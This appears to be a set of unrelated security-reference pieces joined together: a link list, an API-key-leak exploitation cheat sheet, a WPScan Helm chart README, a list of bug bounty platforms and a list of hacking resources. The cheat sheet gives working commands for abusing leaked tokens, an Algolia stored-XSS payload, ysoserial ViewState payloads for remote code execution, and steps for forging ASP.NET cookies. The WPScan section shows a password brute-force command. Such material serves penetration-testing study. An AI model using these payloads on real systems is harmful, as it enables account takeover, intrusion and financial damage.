[http://securestate.blogspot.com/2010/08/xfs-101-cross-frame-scripting-explained.html?utm_source=twitterfeed&utm_medium=twitter](http://securestate.blogspot.com/2010/08/xfs-101-cross-frame-scripting-explained.html?utm_source=twitterfeed&utm_medium=twitter) * [http://whatthefuckismyinformationsecuritystrategy.com/](http://whatthefuckismyinformationsecuritystrategy.com/) * [http://video.google.com/videoplay?docid=4379894308228900017&q=owasp#](http://video.google.com/videoplay?docid=4379894308228900017&q=owasp#) * [http://video.google.com/videoplay?docid=4994651985041179755&ei=_1k4TKj-PI-cqAPioJnKDA&q=deepsec#](http://video.google.com/videoplay?docid=4994651985041179755&ei=_1k4TKj-PI-cqAPioJnKDA&q=deepsec#) * [http://www.sensepost.com/blog/4552.html](http://www.sensepost.com/blog/4552.html) * [http://blog.zenone.org/2009/03/pci-compliance-disable-sslv2-and-weak.html](http://blog.zenone.org/2009/03/pci-compliance-disable-sslv2-and-weak.html) * [http://threatpost.com/en_us/blogs/hd-moore-metasploit-exploitation-and-art-pen-testing-040210](http://threatpost.com/en_us/blogs/hd-moore-metasploit-exploitation-and-art-pen-testing-040210) * [http://carnal0wnage.attackresearch.com/node/410](http://carnal0wnage.attackresearch.com/node/410) * [http://www.cs.ucsb.edu/~adoupe/static/black-box-scanners-dimva2010.pdf](http://www.cs.ucsb.edu/~adoupe/static/black-box-scanners-dimva2010.pdf) * [http://www.spy-hunter.com/Database_Pen_Testing_ISSA_March_25_V2.pdf](http://www.spy-hunter.com/Database_Pen_Testing_ISSA_March_25_V2.pdf) * [http://perishablepress.com/press/2006/01/10/stupid-htaccess-tricks/](http://perishablepress.com/press/2006/01/10/stupid-htaccess-tricks/)
# API Key Leaks > The API key is a unique identifier that is used to authenticate requests associated with your project. Some developers might hardcode them or leave it on public shares. ## Summary - [Tools](#tools) - [Exploit](#exploit) - [Google Maps](#google-maps) - [Algolia](#algolia) - [AWS Access Key ID & Secret](#aws-access-key-id--secret) - [Slack API Token](#slack-api-token) - [Facebook Access Token](#facebook-access-token) - [Github client id and client secret](#github-client-id-and-client-secret) - [Twilio Account_sid and Auth Token](#twilio-account_sid-and-auth-token) - [Twitter API Secret](#twitter-api-secret) - [Twitter Bearer Token](#twitter-bearer-token) - [Gitlab Personal Access Token](#gitlab-personal-access-token) - [HockeyApp API Token](#hockeyapp-api-token) - [IIS Machine Keys](#iis-machine-keys) - [Mapbox API Token](#Mapbox-API-Token) ## Tools - [momenbasel/KeyFinder](https://github.com/momenbasel/KeyFinder) - is a tool that let you find keys while surfing the web - [streaak/keyhacks](https://github.com/streaak/keyhacks) - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid - [trufflesecurity/truffleHog](https://github.com/trufflesecurity/truffleHog) - Find credentials all over the place ```ps1 docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --repo https://github.com/trufflesecurity/test_keys docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --org=trufflesecurity trufflehog git https://github.com/trufflesecurity/trufflehog.git trufflehog github --endpoint https://api.github.com --org trufflesecurity --token GITHUB_TOKEN --debug --concurrency 2 ``` - [aquasecurity/trivy](https://github.com/aquasecurity/trivy) - General purpose vulnerability and misconfiguration scanner which also searches for API keys/secrets - [projectdiscovery/nuclei-templates](https://github.com/projectdiscovery/nuclei-templates) - Use these templates to test an API token against many API service endpoints ```powershell nuclei -t token-spray/ -var token=token_list.txt ``` - [blacklanternsecurity/badsecrets](https://github.com/blacklanternsecurity/badsecrets) - A library for detecting known or weak secrets on across many platforms ```ps1 python examples/cli.py --url http://example.com/contains_bad_secret.html python examples/cli.py eyJhbGciOiJIUzI1NiJ9.eyJJc3N1ZXIiOiJJc3N1ZXIiLCJVc2VybmFtZSI6IkJhZFNlY3JldHMiLCJleHAiOjE1OTMxMzM0ODMsImlhdCI6MTQ2NjkwMzA4M30.ovqRikAo_0kKJ0GVrAwQlezymxrLGjcEiW_s3UJMMCo python ./badsecrets/examples/blacklist3r.py --viewstate /wEPDwUJODExMDE5NzY5ZGQMKS6jehX5HkJgXxrPh09vumNTKQ== --generator EDD8C9AE python ./badsecrets/examples/telerik_knownkey.py --url http://vulnerablesite/Telerik.Web.UI.DialogHandler.aspx python ./badsecrets/examples/symfony_knownkey.py --url https://localhost/ ``` - [mazen160/secrets-patterns-db](https://github.com/mazen160/secrets-patterns-db) - Secrets Patterns DB: The largest open-source Database for detecting secrets, API keys, passwords, tokens, and more. ## Exploit The following commands can be used to takeover accounts or extract personal information from the API using the leaked token. ### Google Maps Use : https://github.com/ozguralp/gmapsapiscanner/ Usage: | Name | Endpoint | | --- | --- | | Static Maps | https://maps.googleapis.com/maps/api/staticmap?center=45%2C10&zoom=7&size=400x400&key=KEY_HERE | | Streetview | https://maps.googleapis.com/maps/api/streetview?size=400x400&location=40.720032,-73.988354&fov=90&heading=235&pitch=10&key=KEY_HERE | | Embed | https://www.google.com/maps/embed/v1/place?q=place_id:ChIJyX7muQw8tokR2Vf5WBBk1iQ&key=KEY_HERE | | Directions | https://maps.googleapis.com/maps/api/directions/json?origin=Disneyland&destination=Universal+Studios+Hollywood4&key=KEY_HERE | | Geocoding | https://maps.googleapis.com/maps/api/geocode/json?latlng=40,30&key=KEY_HERE | | Distance Matrix | https://maps.googleapis.com/maps/api/distancematrix/json?units=imperial&origins=40.6655101,-73.89188969999998&destinations=40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626&key=KEY_HERE | | Find Place from Text | https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=Museum%20of%20Contemporary%20Art%20Australia&inputtype=textquery&fields=photos,formatted_address,name,rating,opening_hours,geometry&key=KEY_HERE | | Autocomplete | https://maps.googleapis.com/maps/api/place/autocomplete/json?input=Bingh&types=%28cities%29&key=KEY_HERE | | Elevation | https://maps.googleapis.com/maps/api/elevation/json?locations=39.7391536,-104.9847034&key=KEY_HERE | | Timezone | https://maps.googleapis.com/maps/api/timezone/json?location=39.6034810,-119.6822510&timestamp=1331161200&key=KEY_HERE | | Roads | https://roads.googleapis.com/v1/nearestRoads?points=60.170880,24.942795|60.170879,24.942796|60.170877,24.942796&key=KEY_HERE | | Geolocate | https://www.googleapis.com/geolocation/v1/geolocate?key=KEY_HERE | Impact: * Consuming the company's monthly quota or can over-bill with unauthorized usage of this service and do financial damage to the company * Conduct a denial of service attack specific to the service if any limitation of maximum bill control settings exist in the Google account ### Algolia ```powershell curl --request PUT \ --url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings \ --header 'content-type: application/json' \ --header 'x-algolia-api-key: <example-key>' \ --header 'x-algolia-application-id: <example-application-id>' \ --data '{"highlightPreTag": "<script>alert(1);</script>"}' ``` ### Slack API Token ```powershell curl -sX POST "https://slack.com/api/auth.test?token=xoxp-TOKEN_HERE&pretty=1" ``` ### Facebook Access Token ```powershell curl https://developers.facebook.com/tools/debug/accesstoken/?access_token=ACCESS_TOKEN_HERE&version=v3.2 ``` ### Github client id and client secret ```powershell curl 'https://api.github.com/users/whatever?client_id=xxxx&client_secret=yyyy' ``` ### Twilio Account_sid and Auth token ```powershell curl -X GET 'https://api.twilio.com/2010-04-01/Accounts.json' -u ACCOUNT_SID:AUTH_TOKEN ``` ### Twitter API Secret ```powershell curl -u 'API key:API secret key' --data 'grant_type=client_credentials' 'https://api.twitter.com/oauth2/token' ``` ### Twitter Bearer Token ```powershell curl --request GET --url https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json --header 'authorization: Bearer TOKEN' ``` ### Gitlab Personal Access Token ```powershell curl "https://gitlab.example.com/api/v4/projects?private_token=<your_access_token>" ``` ### HockeyApp API Token ```powershell curl -H "X-HockeyAppToken: ad136912c642076b0d1f32ba161f1846b2c" https://rink.hockeyapp.net/api/2/apps/2021bdf2671ab09174c1de5ad147ea2ba4 ``` ### IIS Machine Keys > That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification. Requirements * machineKey **validationKey** and **decryptionKey** * __VIEWSTATEGENERATOR cookies * __VIEWSTATE cookies Example of a machineKey from https://docs.microsoft.com/en-us/iis/troubleshoot/security-issues/troubleshooting-forms-authentication. ```xml <machineKey validationKey="87AC8F432C8DB844A4EFD024301AC1AB5808BEE9D1870689B63794D33EE3B55CDB315BB480721A107187561F388C6BEF5B623BF31E2E725FC3F3F71A32BA5DFC" decryptionKey="E001A307CCC8B1ADEA2C55B1246CDCFE8579576997FF92E7" validation="SHA1" /> ``` Common locations of **web.config** / **machine.config** * 32-bit * C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config * C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config * 64-bit * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\config\machine.config * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\machine.config * in registry when **AutoGenerate** is enabled (extract with https://gist.github.com/irsdl/36e78f62b98f879ba36f72ce4fda73ab) * HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\4.0.30319.0\AutoGenKeyV4 * HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\2.0.50727.0\AutoGenKey #### Identify known machine key * Exploit with [Blacklist3r/AspDotNetWrapper](https://github.com/NotSoSecure/Blacklist3r) * Exploit with [ViewGen](https://github.com/0xacb/viewgen) ```powershell # --webconfig WEBCONFIG: automatically load keys and algorithms from a web.config file # -m MODIFIER, --modifier MODIFIER: VIEWSTATEGENERATOR value $ viewgen --guess "/wEPDwUKMTYyODkyNTEzMw9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkuVmqYhhtcnJl6Nfet5ERqNHMADI=" [+] ViewState is not encrypted [+] Signature algorithm: SHA1 # --encrypteddata : __VIEWSTATE parameter value of the target application # --modifier : __VIEWSTATEGENERATOR parameter value $ AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata <real viewstate value> --purpose=viewstate --modifier=<modifier value> โ€“macdecode ``` #### Decode ViewState ```powershell $ viewgen --decode --check --webconfig web.config --modifier CA0B0334 "zUylqfbpWnWHwPqet3cH5Prypl94LtUPcoC7ujm9JJdLm8V7Ng4tlnGPEWUXly+CDxBWmtOit2HY314LI8ypNOJuaLdRfxUK7mGsgLDvZsMg/MXN31lcDsiAnPTYUYYcdEH27rT6taXzDWupmQjAjraDueY=" $ .\AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --decrypt --purpose=viewstate --modifier=CA0B0334 --macdecode $ .\AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --decrypt --purpose=viewstate --modifier=6811C9FF --macdecode --TargetPagePath "/Savings-and-Investments/Application/ContactDetails.aspx" -f out.txt --IISDirPath="/" ``` #### Generate ViewState for RCE **NOTE**: Send a POST request with the generated ViewState to the same endpoint, in Burp you should **URL Encode Key Characters** for your payload. ```powershell $ ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd.exe /c nslookup <your collab domain>" --decryptionalg="AES" --generator=ABABABAB decryptionkey="<decryption key>" --validationalg="SHA1" --validationkey="<validation key>" $ ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "echo 123 > c:\pwn.txt" --generator="CA0B0334" --validationalg="MD5" --validationkey="b07b0f97365416288cf0247cffdf135d25f6be87" $ ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "C:\Users\zhu\Desktop\ExploitClass.cs;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.dll;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Web.dll" --generator="CA0B0334" --validationalg="SHA1" --validationkey="b07b0f97365416288cf0247cffdf135d25f6be87" $ viewgen --webconfig web.config -m CA0B0334 -c "ping yourdomain.tld" ``` #### Edit cookies with the machine key If you have the machineKey but the viewstate is disabled. ASP.net Forms Authentication Cookies : https://github.com/liquidsec/aspnetCryptTools ```powershell # decrypt cookie $ AspDotNetWrapper.exe --keypath C:\MachineKey.txt --cookie XXXXXXX_XXXXX-XXXXX --decrypt --purpose=owin.cookie --valalgo=hmacsha512 --decalgo=aes # encrypt cookie (edit Decrypted.txt) $ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt ``` ### Mapbox API Token A Mapbox API Token is a JSON Web Token (JWT). If the header of the JWT is `sk`, jackpot. If it's `pk` or `tk`, it's not worth your time. ``` #Check token validity curl "https://api.mapbox.com/tokens/v2?access_token=YOUR_MAPBOX_ACCESS_TOKEN" #Get list of all tokens associated with an account. (only works if the token is a Secret Token (sk), and has the appropiate scope) curl "https://api.mapbox.com/tokens/v2/MAPBOX_USERNAME_HERE?access_token=YOUR_MAPBOX_ACCESS_TOKEN" ``` ## References * [Finding Hidden API Keys & How to use them - Sumit Jain - August 24, 2019](https://medium.com/@sumitcfe/finding-hidden-api-keys-how-to-use-them-11b1e5d0f01d) * [Private API key leakage due to lack of access control - yox - August 8, 2018](https://hackerone.com/reports/376060) * [Project Blacklist3r - November 23, 2018 - @notsosecure](https://www.notsosecure.com/project-blacklist3r/) * [Saying Goodbye to my Favorite 5 Minute P1 - Allyson O'Malley - January 6, 2020](https://www.allysonomalley.com/2020/01/06/saying-goodbye-to-my-favorite-5-minute-p1/) * [Mapbox API Token Documentation](https://docs.mapbox.com/help/troubleshooting/how-to-use-mapbox-securely/)
--- title: 'WPScan' category: 'scanner' type: "CMS" state: "released" appVersion: "v3.8.19" usecase: "Wordpress Vulnerability Scanner" --- ![WPScan Logo](https://raw.githubusercontent.com/wpscanteam/wpscan/gh-pages/images/wpscan_logo.png) <!-- SPDX-FileCopyrightText: 2021 iteratec GmbH SPDX-License-Identifier: Apache-2.0 --> <!-- .: IMPORTANT! :. -------------------------- This file is generated automatically with `helm-docs` based on the following template files: - ./.helm-docs/templates.gotmpl (general template data for all charts) - ./chart-folder/.helm-docs.gotmpl (chart specific template data) Please be aware of that and apply your changes only within those template files instead of this file. Otherwise your changes will be reverted/overwritten automatically due to the build process `./.github/workflows/helm-docs.yaml` -------------------------- --> <p align="center"> <a href="https://opensource.org/licenses/Apache-2.0"><img alt="License Apache-2.0" src="https://img.shields.io/badge/License-Apache%202.0-blue.svg"/></a> <a href="https://github.com/secureCodeBox/secureCodeBox/releases/latest"><img alt="GitHub release (latest SemVer)" src="https://img.shields.io/github/v/release/secureCodeBox/secureCodeBox?sort=semver"/></a> <a href="https://owasp.org/www-project-securecodebox/"><img alt="OWASP Incubator Project" src="https://img.shields.io/badge/OWASP-Incubator%20Project-365EAA"/></a> <a href="https://artifacthub.io/packages/search?repo=securecodebox"><img alt="Artifact HUB" src="https://img.shields.io/endpoint?url=https://artifacthub.io/badge/repository/securecodebox"/></a> <a href="https://github.com/secureCodeBox/secureCodeBox/"><img alt="GitHub Repo stars" src="https://img.shields.io/github/stars/secureCodeBox/secureCodeBox?logo=GitHub"/></a> <a href="https://twitter.com/securecodebox"><img alt="Twitter Follower" src="https://img.shields.io/twitter/follow/securecodebox?style=flat&color=blue&logo=twitter"/></a> </p> ## What is WPScan? WPScan is a free, for non-commercial use, black box WordPress vulnerability scanner written for security professionals and blog maintainers to test the security of their sites. > NOTE: You need to provide WPSan with an API Token so that it can look up vulnerabilities infos with [https://wpvulndb.com](https://wpvulndb.com). Without the token WPScan will only identify WordPress Core / Plugin / Theme versions but not if they are actually vulnerable. You can get a free API Token at by registering for an account at [https://wpvulndb.com](https://wpvulndb.com). Using the secureCodeBox WPScans you can specify the token via the `WPVULNDB_API_TOKEN` target attribute, see the example below. To learn more about the WPScan scanner itself visit [wpscan.org] or [wpscan.io]. ## Deployment The wpscan chart can be deployed via helm: ```bash # Install HelmChart (use -n to configure another namespace) helm upgrade --install wpscan secureCodeBox/wpscan ``` ## Scanner Configuration The following security scan configuration example are based on the [WPScan Documentation], please take a look at the original documentation for more configuration examples. * Scan all plugins with known vulnerabilities: `wpscan --url example.com -e vp --plugins-detection mixed --api-token WPVULNDB_API_TOKEN` * Scan all plugins in our database (could take a very long time): `wpscan --url example.com -e ap --plugins-detection mixed --api-token WPVULNDB_API_TOKEN` * Password brute force attack: `wpscan --url example.com -e u --passwords /path/to/password_file.txt` * WPScan keeps a local database of metadata that is used to output useful information, such as the latest version of a plugin. The local database can be updated with the following command: `wpscan --update` * When enumerating the WordPress version, installed plugins or installed themes, you can use three different "modes", which are: * passive * aggressive * mixed If you want the most results use the "mixed" mode. However, if you are worried that the server may not be able to handle many requests, use the "passive" mode. The default mode is "mixed", except plugin enumeration, which is "passive". You will need to manually override the plugin detection mode, if you want to use anything other than the default, with the `--plugins-detection` option. * WPScan can enumerate various things from a remote WordPress application, such as plugins, themes, usernames, backed up files wp-config.php files, Timthumb files, database exports and more. To use WPScan's enumeration capabilities supply the `-e `option. ```bash Available Choices: vp | Vulnerable plugins ap | All plugins p | Plugins vt | Vulnerable themes at | All themes t | Themes tt | Timthumbs cb | Config backups dbe | Db exports u | User IDs range. e.g: u1-5 Range separator to use: '-' Value if no argument supplied: 1-10 m | Media IDs range. e.g m1-15 Note: Permalink setting must be set to "Plain" for those to be detected Range separator to use: '-' Value if no argument supplied: 1-100 Separator to use between the values: ',' Default: All Plugins, Config Backups Value if no argument supplied: vp,vt,tt,cb,dbe,u,m Incompatible choices (only one of each group/s can be used): - vp, ap, p - vt, at, t ``` ## Requirements Kubernetes: `>=v1.11.0-0` ## Values | Key | Type | Default | Description | |-----|------|---------|-------------| | cascadingRules.enabled | bool | `false` | Enables or disables the installation of the default cascading rules for this scanner | | parser.env | list | `[]` | Optional environment variables mapped into each parseJob (see: https://kubernetes.io/docs/tasks/inject-data-application/define-environment-variable-container/) | | parser.image.pullPolicy | string | `"IfNotPresent"` | Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images | | parser.image.repository | string | `"docker.io/securecodebox/parser-wpscan"` | Parser image repository | | parser.image.tag | string | defaults to the charts version | Parser image tag | | parser.ttlSecondsAfterFinished | string | `nil` | seconds after which the kubernetes job for the parser will be deleted. Requires the Kubernetes TTLAfterFinished controller: https://kubernetes.io/docs/concepts/workloads/controllers/ttlafterfinished/ | | scanner.activeDeadlineSeconds | string | `nil` | There are situations where you want to fail a scan Job after some amount of time. To do so, set activeDeadlineSeconds to define an active deadline (in seconds) when considering a scan Job as failed. (see: https://kubernetes.io/docs/concepts/workloads/controllers/job/#job-termination-and-cleanup) | | scanner.backoffLimit | int | 3 | There are situations where you want to fail a scan Job after some amount of retries due to a logical error in configuration etc. To do so, set backoffLimit to specify the number of retries before considering a scan Job as failed. (see: https://kubernetes.io/docs/concepts/workloads/controllers/job/#pod-backoff-failure-policy) | | scanner.env | list | `[]` | Optional environment variables mapped into each scanJob (see: https://kubernetes.io/docs/tasks/inject-data-application/define-environment-variable-container/) | | scanner.extraContainers | list | `[]` | Optional additional Containers started with each scanJob (see: https://kubernetes.io/docs/concepts/workloads/pods/init-containers/) | | scanner.extraVolumeMounts | list | `[]` | Optional VolumeMounts mapped into each scanJob (see: https://kubernetes.io/docs/concepts/storage/volumes/) | | scanner.extraVolumes | list | `[]` | Optional Volumes mapped into each scanJob (see: https://kubernetes.io/docs/concepts/storage/volumes/) | | scanner.image.pullPolicy | string | `"IfNotPresent"` | Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images | | scanner.image.repository | string | `"wpscanteam/wpscan"` | Container Image to run the scan | | scanner.image.tag | string | `nil` | defaults to the charts appVersion | | scanner.nameAppend | string | `nil` | append a string to the default scantype name. | | scanner.resources | object | `{}` | CPU/memory resource requests/limits (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-memory-resource/, https://kubernetes.io/docs/tasks/configure-pod-container/assign-cpu-resource/) | | scanner.securityContext | object | `{"allowPrivilegeEscalation":false,"capabilities":{"drop":["all"]},"privileged":false,"readOnlyRootFilesystem":false,"runAsNonRoot":false}` | Optional securityContext set on scanner container (see: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/) | | scanner.securityContext.allowPrivilegeEscalation | bool | `false` | Ensure that users privileges cannot be escalated | | scanner.securityContext.capabilities.drop[0] | string | `"all"` | This drops all linux privileges from the container. | | scanner.securityContext.privileged | bool | `false` | Ensures that the scanner container is not run in privileged mode | | scanner.securityContext.readOnlyRootFilesystem | bool | `false` | Prevents write access to the containers file system | | scanner.securityContext.runAsNonRoot | bool | `false` | Enforces that the scanner image is run as a non root user | | scanner.ttlSecondsAfterFinished | string | `nil` | seconds after which the kubernetes job for the scanner will be deleted. Requires the Kubernetes TTLAfterFinished controller: https://kubernetes.io/docs/concepts/workloads/controllers/ttlafterfinished/ | ## License [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0) Code of secureCodeBox is licensed under the [Apache License 2.0][scb-license]. [scb-owasp]: https://www.owasp.org/index.php/OWASP_secureCodeBox [scb-docs]: https://docs.securecodebox.io/ [scb-site]: https://www.securecodebox.io/ [scb-github]: https://github.com/secureCodeBox/ [scb-twitter]: https://twitter.com/secureCodeBox [scb-slack]: https://join.slack.com/t/securecodebox/shared_invite/enQtNDU3MTUyOTM0NTMwLTBjOWRjNjVkNGEyMjQ0ZGMyNDdlYTQxYWQ4MzNiNGY3MDMxNThkZjJmMzY2NDRhMTk3ZWM3OWFkYmY1YzUxNTU [scb-license]: https://github.com/secureCodeBox/secureCodeBox/blob/master/LICENSE [wpscan.io]: https://wpscan.io/ [wpscan.org]: https://wpscan.org/ [WPScan Documentation]: https://github.com/wpscanteam/wpscan/wiki/WPScan-User-Documentation
![BBR](https://raw.githubusercontent.com/BugBountyResources/Resources/master/BBR%20alpha%20logo.png) [![Come chat with us!](https://badges.gitter.im/USER/REPO.png)](https://gitter.im/BBRteam/Lobby "Gitter Chat") # Bug Bounty Resources Storehouse of resources related to Bug Bounty Hunting collected from different sources. Watch and Star this repo for all latest guides, tools, methodology, platforms tips, and tricks curated by us. # Getting Started (in Bug Hunting and More...) ## Coming Soon, till then, just keep watching or, ๐ŸŒŸ (starring) us! Thanks for your patience. # Bug Bounty Platforms ## List of Top Platforms (Open/Public) - ## Hackerone (H1) - ## BugCrowd (BC) - ## Intigriti - ## BountyGraph (Software dependencies) [Closing on 12th December, 2018] - ## BountyFactory - ## OpenBugBounty (OBB) [Limited to XSSi and other non-intrusive type vulnerabilities] ## List of Top (Closed/Invite-only) Platforms - ## Synack - ## Cobalt - ## Zerocopter - ## Detectify ## Upcoming Platforms ### Have an insider edge over the newer platforms, be the first to join them! - ## PlugBounty (Vulnerabilities in Plugins) - ## BugsBounty (Indian origin) ## Misc. Other Platforms (Open) - ## Hackenproof (crypto) - ## Immunefi (cryto) - ## BugBountyjp (Issues - Payment Delays) - ## BugsBounty (Upcoming Platform, currently running Internally and exclusively) - ## CESPPA - ## Hackrfi - ## Safehats (Indian origin, although registration is open, goes through validation) - ## Hacktrophy - ## Cyberarmy.id (Indonesian Origin) - ## FireBounty (collection/list of bug bounty programs on different platforms like hackerone, bugcrowd, etc.) ## Misc. other (Invite-only/closed) Platforms - ## BugBountyZone - ## Federacy - ## Yogosha - ## Vulnscope - ## Antihack (dubious/infamous for non-payments, and other issues) ## Programs ### List of Crypto Bounty programs - [List of programs on Immunefi](https://github.com/BugBountyResources/Resources/blob/master/cryptobounty.md) #### A word of caution goes here, we don't endorse or, opine about any platforms and the comments about them in parentheses merely reflect unbiased information which we gathered from the community and other credible sources. Platforms marked dubious, have payment delays and issues, so care should be taken while working on them.
# Hacking-Resources --- This repository contains some resources for ethical hackers penetration tester ๐Ÿ˜Š This may contain some files, tools, books, and links that need to be used for good purposes only. Do not do any illegal work using these sources. This is only for keeping some resources and topics in one-place to access easily. > ***Find my 350+ tryhackme rooms' list [here](https://github.com/rng70/tryhackme-roadmap)*** ## Sections --- --- --- * [Book List](#book-list) * [Everything You Need to Know to Become a HACKER](#everything-you-need-to-know-to-become-a-hacker) * [PART I: THE ESSENTIALS](#part-i-the-essentials) * [PART II: GLOSSARY](#part-ii-glossary) * [Why is HTML important in pen-testing?](#why-is-html-important-in-pen-testing?) * [Why Kali Linux and why in a Virtual Machine(VM)?](#why-kali-linux-and-why-in-a-virtual-machine(vm)?) * [Why learn Debian commands?](#why-learn-debian-commands?) * [Why use Tor, ProxyChains, Whonix or a VPN?](#why-use-tor,-proxychains,-whonix-or-a-vpn?) * [Why use nmap, Burp-Suite and SQLMAP?](#why-use-nmap,-burp-suite-and-sqlmap?) * [Why learn to use the Metasploit Framework?](#why-learn-to-use-the-metasploit-framework?) * [Why understand WEP/WPA?](#why-understand-wep/wpa?) * [Why master the air-ng suite (use for wireless hacking)?](#why-master-the-air-ng-suite-(use-for-wireless-hacking)?) * [Why learn how to perform MITM (man in the middle) attacks, sniff networks and tamper data?](#why-learn-how-to-perform-mitm-(man-in-the-middle)-attacks,-sniff-networks-and-tamper-data?) * [What is Brute-forcing?](#what-is-brute-forcing?) * [Why learn XSS, LFI, RFI?](#why-learn-xss,-lfi,-rfi?) * [What is a backdoor in Pen-testing?](#what-is-a-backdoor-in-pen-testing?) * [Links of Different Topics](#links-of-different-topics) * Course Links * [Free Courses](http://bit.ly/2UkY5Za "Resources Point") * [MyCollection](https://drive.google.com/drive/folders/1X8gUaDVnCPBaOXpnTRHE0hn2ZKtO9GJx?usp=sharing "rng70's drive") * [Hack the Box (HTB) machines walkthrough series](https://resources.infosecinstitute.com/hack-the-box-htb-walkthrough-access/ "https://resources.infosecinstitute.com/hack-the-box-htb-walkthrough-access/") * Tools * [Regon-ng](https://github.com/jhaddix/domain "https://github.com/jhaddix/domain") * [Intrigue](https://github.com/intrigueio/intrigue-core "https://github.com/intrigueio/intrigue-core") * [SecLists](https://github.com/danielmiessler/SecLists "https://github.com/danielmiessler/SecLists") * [Autorize](https://github.com/Quitten/Autorize#autorize "https://github.com/Quitten/Autorize#autorize") * [ForceSSL](https://github.com/arvinddoraiswamy/mywebappscripts/tree/master/ForceSSL "https://github.com/arvinddoraiswamy/mywebappscripts/tree/master/ForceSSL") * [binwalk](https://github.com/ReFirmLabs/binwalk "https://github.com/ReFirmLabs/binwalk") * [stegsolve (hidden text discover tool)](http://www.caesum.com/handbook/Stegsolve.jar "http://www.caesum.com/handbook/Stegsolve.jar") * [zardus/ctf-tools](https://github.com/zardus/ctf-tools "https://github.com/zardus/ctf-tools") * [DidierStevensSuite](https://github.com/DidierStevens/DidierStevensSuite "https://github.com/DidierStevens/DidierStevensSuite") * [Best SQL injection resources](#best-sql-injection-resources) * [Capture The Flag](#ctf) * [Capture The Flag Framework](#ctf-framework) * [Hacker101 Syllabus](#hacker101-syllabus) * [Random Collected Topics](#random-collected-topics) * [Footprinting and Information Gathering](#footprinting-and-information-gathering) * [PHP and SQL](#php-and-sql) * [System Hacking](#system-hacking) * [Malware](#malware) * [Social Engineering](#social-engineering) * [Denial of Service(DOS)](#denial-of-service(dos)) * [SQL Injection](#sql-injection) * [Evading IDS, Firewalls, and Honeypots](#evading-ids,-firewalls,-and-honeypots) * [Scanning Networks Web Server](#scanning-networks-web-server) * [Attack](#attack) * [Extra](#extra) * [Exam Preparation](#exam-preparation) <h1><summary>๐Ÿ”ฐ Some topics for self Learning ๐Ÿ”ฐ</summary></h1> <details> <summary>Topics</summary> * Attacking HTTPS with Cache Injection * Bruteforce of PHPSESSID โ€‹ * Blended Threats and JavaScript * Broken Authentication and Session Management * CAPTCHA Re-Riding Attack * Chronofeit Phishing * Click Jacking Attacks * Cookie Eviction * Cookie Poisoning * Cross-Site Port Attacks * Cross-Site Request Forgery (CSRF) * Cross-Site Scripting (XSS) * Cross Site Scripting Attacks * Bypassing CSRF protections with Click Jacking and * Denial oF Service Attack * Direct OS Code Injection * DNS Cache Poisoning * EverCookie * Fooling B64_Encode(Payload) on WAFs And Filters * Generic Cross-Browser Cross-Domain theft * Hibernate Query Language Injection * HTTP Parameter Pollution * Improving HTTPS Side Channel Attacks * Insecure Direct Object References * Local file inclusion * Lost iN Translation * MitM DNS Rebinding SSL/TLS Wildcards and XSS * Missing Function Level Access Control * MySQL Stacked Queries with SQL Injection. * NAT Pinning * Next Generation Click Jacking * Persistent Cross Interface Attacks * PHPwn * Posting Raw XML cross-domain * Quick Proxy Detection * Remote Code Execution Attacks * Remote File inclusion * Security Misconfiguration * Sensitive Data Exposure * Side Channel Attacks in SSL * Sql Injection Attack * SQLi Filter Evasion Cheat Sheet (MySQL) * SSRF * Stroke Jacking * Stroke triggered XSS and Stroke Jacking * Symlinking โ€“ An Insider Attack * Tap Jacking * Tabnabbing * Turning XSS into Clickjacking * UI Redressing * Unvalidated Redirects and Forwards * URL Hijacking * Using Components with Known Vulnerabilities * XML Entity Injection * XSHM * XSS - Track * XSSing Client-Side Dynamic HTML </details> ๐Ÿฆš From Beginner to Expert Tryhackme Walkthrough ๐Ÿฆš 